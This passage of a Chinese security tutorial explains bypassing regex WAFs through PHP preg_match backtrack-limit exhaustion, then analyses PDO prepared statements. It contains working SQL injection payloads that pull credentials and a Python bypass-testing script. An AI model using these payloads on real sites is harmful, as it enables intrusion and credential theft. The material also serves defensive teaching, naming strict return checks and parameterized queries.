│ 攻击者构造 Payload │
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────┐ │
│ │ SQL注入语句 + 大量填充字符(触发回溯) │ │
│ │ 例: "union select" + "a"*1000000 │ │
│ └─────────────────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────┐ │
│ │ WAF 正则检测 │ │
│ │ preg_match('/union|select/i', $input) │ │
│ └─────────────────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────┐ │
│ │ 正则引擎开始回溯... │ │
│ │ 回溯次数: 1, 2, 3 ... 1000000+ │ │
│ │ 超过 pcre.backtrack_limit! │ │
│ └─────────────────────────────────────────────┘ │
│ │ │
│ ▼ │
│ preg_match() 返回 false (不是0!) │
│ │ │
│ ▼ │
│ if(false) 条件不成立 → WAF放行 → SQL注入成功! │
│ │
└──────────────────────────────────────────────────────────────────┘四、实战示例
示例1:基础绕过
php
<?php
// 模拟有漏洞的WAF
function vulnerable_waf($input) {
// 使用贪婪匹配的复杂正则
$pattern = '/(?:select|union|insert|update|delete)[\s\S]*?(?:from|into|set|values)/i';
if (preg_match($pattern, $input)) {
die("WAF: SQL Injection Detected!");
}
return $input;
}
// 正常攻击 - 被拦截
$normal_payload = "1' union select * from users--";
// 结果: WAF: SQL Injection Detected!
// 回溯绕过攻击
$evil_payload = "1' union select * from users--" . str_repeat('a', 1000000);
// 结果: 绕过WAF!示例2:使用特殊字符触发回溯
php
<?php
// 更复杂的WAF正则(容易触发回溯的模式)
$pattern = '/union[\s\S]*?select/i';
// 构造触发回溯的payload
// 原理:让 [\s\S]*? 反复尝试匹配
$payload = "union/*" . str_repeat('!', 500000) . "*/select";
// 正则引擎处理过程:
// 1. 匹配到 "union"
// 2. [\s\S]*? 开始惰性匹配
// 3. 遇到大量 '!' 字符
// 4. 每次尝试后发现不是 "select",回溯
// 5. 回溯次数超过限制 → 返回 false示例3:实际CTF场景
php
<?php
// 题目代码
function check_sql($input) {
$blacklist = '/union|select|from|where|and|or/i';
if (preg_match($blacklist, $input)) {
return "Hacker!";
}
return $input;
}
$id = $_GET['id'];
$safe_id = check_sql($id);
// 如果绕过检测,执行查询
$sql = "SELECT * FROM users WHERE id = '$safe_id'";
$result = mysqli_query($conn, $sql);攻击脚本:
python
import requests
# 目标URL
url = "http://target.com/vuln.php"
# 构造回溯绕过payload
payload = "1' union select username,password from users--"
padding = "a" * 1000001 # 超过默认回溯限制
# 方法1:payload后填充
attack1 = payload + padding
# 方法2:使用SQL注释包裹
attack2 = f"1' union/*{padding}*/select username,password from users--"
# 发送请求
response = requests.get(url, params={"id": attack2})
print(response.text)五、不同的填充技巧
1. 利用SQL注释
sql
-- 基础payload
1' union select 1,2,3 from admin--
-- 回溯绕过版本(利用内联注释)
1' union/*aaaaaaa....(100万个a)....aaaaaaa*/select 1,2,3 from admin--2. 利用空白字符变体
sql
-- 使用各种空白字符的组合
1'%09union%0a%0d/*aaa...*/select%0b1,2,3%0cfrom%a0admin--
-- %09 = TAB
-- %0a = 换行
-- %0d = 回车
-- %0b = 垂直制表符
-- %0c = 换页符
-- %a0 = 不间断空格3. Python自动化脚本
python
#!/usr/bin/env python3
"""
SQL注入正则回溯绕过工具
"""
import requests
import sys
def generate_bypass_payload(sql_payload, padding_length=1000001):
"""
生成绕过WAF的payload
"""
# 方法1: 直接在末尾填充
bypass1 = sql_payload + ("a" * padding_length)
# 方法2: 使用SQL注释包裹填充
bypass2 = sql_payload.replace(
"union",
f"union/*{'x' * padding_length}*/"
)
# 方法3: 在select前填充
bypass3 = sql_payload.replace(
"select",
f"/*{'y' * padding_length}*/select"
)
return [bypass1, bypass2, bypass3]
def test_bypass(url, param, payloads):
"""
测试绕过是否成功
"""
for i, payload in enumerate(payloads):
print(f"[*] 测试方法 {i+1}...")
try:
resp = requests.get(
url,
params={param: payload},
timeout=30
)
if "error" not in resp.text.lower() and "hacker" not in resp.text.lower():
print(f"[+] 方法 {i+1} 可能成功!")
print(f"[+] 响应长度: {len(resp.text)}")
return True
except Exception as e:
print(f"[-] 请求失败: {e}")
return False
if __name__ == "__main__":
# 示例用法
target_url = "http://example.com/vuln.php"
original_payload = "1' union select username,password from users--"
bypass_payloads = generate_bypass_payload(original_payload)
test_bypass(target_url, "id", bypass_payloads)
python
关键要点:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. preg_match() 返回值有三种: 1(匹配), 0(不匹配), false(错误)
2. 回溯超限时返回 false,很多WAF误将其当作"未匹配"
3. 通过填充大量字符可以触发回溯超限
4. 防御:严格检查返回值 (=== 1) 或限制输入长度
5. 最佳实践:使用参数化查询从根本上防止SQL注入
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━PDO防sql注入原理分析
python
1. 函数过滤 addsalses 单双引号 小心宽字节注入
2. waf过滤,雷池,宝塔,南墙等等
3. RASP过滤 关键词 union select user()
4. pdo防注入
waf 宝塔waf 雷池waf 南墙waf
毋庸置疑 4
现在所有的现代化框架 都使用pdo进行防sql注入
预编译
select * from users where id= ?
select * from users where id = 1
sql->bind('username','admin');使用pdo的预处理方式可以避免sql注入。
在php手册中'PDO--预处理语句与存储过程'下的说明:
-
很多更成熟的数据库都支持预处理语句的概念。什么是预处理语句?可以把它看作是想要运行的 SQL 的一种编译过的模板,它可以使用变量参数进行定制。预处理语句可以带来两大好处:
-
查询仅需解析(或预处理)一次,但可以用相同或不同的参数执行多次。当查询准备好后,数据库将分析、编译和优化执行该查询的计划。对于复杂的查询,此过程要花费较长的时间,如果需要以不同参数多次重复相同的查询,那么该过程将大大降低应用程序的速度。通过使用预处理语句,可以避免重复分析/编译/优化周 期。简言之,预处理语句占用更少的资源,因而运行得更快。
-
提供给预处理语句的参数不需要用引号括起来,驱动程序会自动处理。如果应用程序只使用预处理语句,可以确保不会发生SQL 注入。(然而,如果查询的其他部分是由未转义的输入来构建的,则仍存在 SQL 注入的风险)。
-
预处理语句如此有用,以至于它们唯一的特性是在驱动程序不支持的时PDO 将模拟处理。这样可以确保不管数据库是否具有这样的功能,都可以确保应用程序可以用相同的数据访问模式。
下边分别说明一下上述两点好处:
1.首先说说mysql的存储过程,mysql5中引入了存储过程特性,存储过程创建的时候,数据库已经对其进行了一次解析和优化。其次,存储过程一旦执行,在内存中就会保留一份这个存储过程,这样下次再执行同样的存储过程时,可以从内存中直接中读取。mysql存储过程的使用可以参看:http://maoyifa100.iteye.com/blog/1900305
对于PDO,原理和其相同,只是PDO支持EMULATE_PREPARES(模拟预处理)方式,是在本地由PDO驱动完成,同时也可以不使用本地的模拟预处理,交由mysql完成,下边会对这两种情况进行说明。
2.防止sql注入,我通过tcpdump和wireshark结合抓包来分析一下。
在虚拟机上执行一段代码,对远端mysql发起请求:
python
<?php
$pdo = new PDO("mysql:host=127.0.0.1;dbname=test;charset=utf8", "root","root123");
$st = $pdo->prepare("select * from users where id =?");
$id = $_GET['id'];
$st->bindParam(1, $id);
$st->execute();
$ret = $st->fetchAll();
print_r($ret);通过抓包生成文件:
通过wireshark打开文件:
可以看到整个过程:3次握手--Login Request--Request Query--Request Quit
查看Request Query包可以看到:
这不也是拼接sql语句么?
其实,这与我们平时使用mysql_real_escape_string将字符串进行转义,再拼接成SQL语句没有差别,只是由PDO本地驱动完成转义的(EMULATE_PREPARES)
这种情况下还是有可能造成SQL 注入的,也就是说在php本地调用pdo prepare中的mysql_real_escape_string来操作query,使用的是本地单字节字符集,而我们传递多字节编码的变量时,有可能还是会造成SQL注入漏洞(php 5.3.6以前版本的问题之一,这也就解释了为何在使用PDO时,建议升级到php 5.3.6+,并在DSN字符串中指定charset的原因)。
预防方法
PDO有一项参数,名为PDO::ATTR_EMULATE_PREPARES ,表示是否使用PHP本地模拟prepare,此项参数默认true,我们改为false后再抓包看看。
先在代码第一行后添加
python
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);php对sql语句发送采用了prepare--execute方式
这次的变量转义处理交由mysql server来执行。
既然变量和SQL模板是分两次发送的,那么就不存在SQL注入的问题了,但明显会多一次传输,这在php5.3.6之后是不需要的。